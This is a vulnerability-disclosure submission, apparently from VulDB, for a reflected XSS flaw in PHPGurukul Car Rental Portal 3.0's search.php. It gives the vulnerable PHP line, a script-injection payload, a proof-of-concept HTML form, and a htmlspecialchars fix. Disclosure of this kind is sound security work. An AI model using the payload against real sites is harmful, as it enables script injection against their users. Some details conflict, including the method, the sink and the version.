提出 #435179: PHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax情報

タイトルPHPGurukul Car Rental Portal 3.0 Improper Neutralization of Alternate XSS Syntax
説明[XSS vulnerability] found in Car Rental Portal 3.0 - (search.php) Affected Project: Car Rental Portal Web: Php Vendor: PHPGurukul Official Website: (https://phpgurukul.com/car-rental-project-php-mysql-free-download/) Version: 3.0 Updated: 05 June 2024 Vulnerable file: /search.php Injection parameter: searchdata Size: 16.0 MB Sha256: 8a9ad60cf5f36e2c3c4a1ce6fed7438bb458a2d2489e2a1be60dbbdd481fdf8b Vulnerability Description: The issue arises because the `searchdata` parameter from the URL is being directly inserted into the value attribute of an HTML input element without proper sanitization. This allows an attacker to inject arbitrary HTML or JavaScript code leading to an XSS attack. Vulnerable code: <h1>Search Result of keyword "<?php echo $_POST['searchdata'];?>"</h1> Injection Payload Tested: We set `searchdata` to: "><script>alert('XSS')</script> Execution: When the browser parses this through a POST request, it executes the `<script>alert('XSS')</script>` code, resulting in a popup displaying `"XSS"`. <br /> Demonstration: Below is how `search.php` looks like: https://i.postimg.cc/mg6Vs6Vd/1.png As it is a POST request we need to use a file test_form.html with the following content to be able to trigger the XSS popup: <!DOCTYPE html> <html> <head> <title>Search Form</title> </head> <body> <form action="http://localhost:8000/carrental/search.php" method="POST"> <input type="text" name="searchdata" value='"><script>alert("XSS")</script>'> <input type="submit" value="Search"> </form> </body> </html> Then we have to open it on the browser: For example: file:///home/username/Desktop/test_form.html https://i.postimg.cc/nVYkzL09/2.png After submitting the payload using POST with the vulnerable parameter `searchdata` and the XSS payload `"><script>alert('XSS')</script>`, XSS is triggered: https://i.postimg.cc/t4fdfnCw/3.png Recommendation for Preventing XSS: To fix this vulnerability, we must always sanitize user inputs before rendering them in the HTML. We can use functions like htmlspecialchars() in PHP to encode special characters. Example: // Retrieve the search data using GET $searchData = isset($_GET['searchdata']) ? $_GET['searchdata'] : ''; // Escape the output to prevent XSS $safeSearchData = htmlspecialchars($searchData, ENT_QUOTES, 'UTF-8'); > One Click Can Change Everything: Be Secure.
ソース⚠️ https://github.com/secuserx/CVE/blob/main/%5BXSS%20vulnerability%5D%20found%20in%20Car%20Rental%20Portal%203.0%20-%20(search.php).md
ユーザー
 secuserx (UID 76735)
送信2024年11月01日 01:17 (2 年 ago)
モデレーション2024年11月01日 18:07 (17 hours later)
ステータス承諾済み
VulDBエントリ282869 [PHPGurukul Car Rental Portal 1.0 /search.php searchdata クロスサイトスクリプティング]
ポイント20

Want to stay up to date on a daily basis?

Enable the mail alert feature now!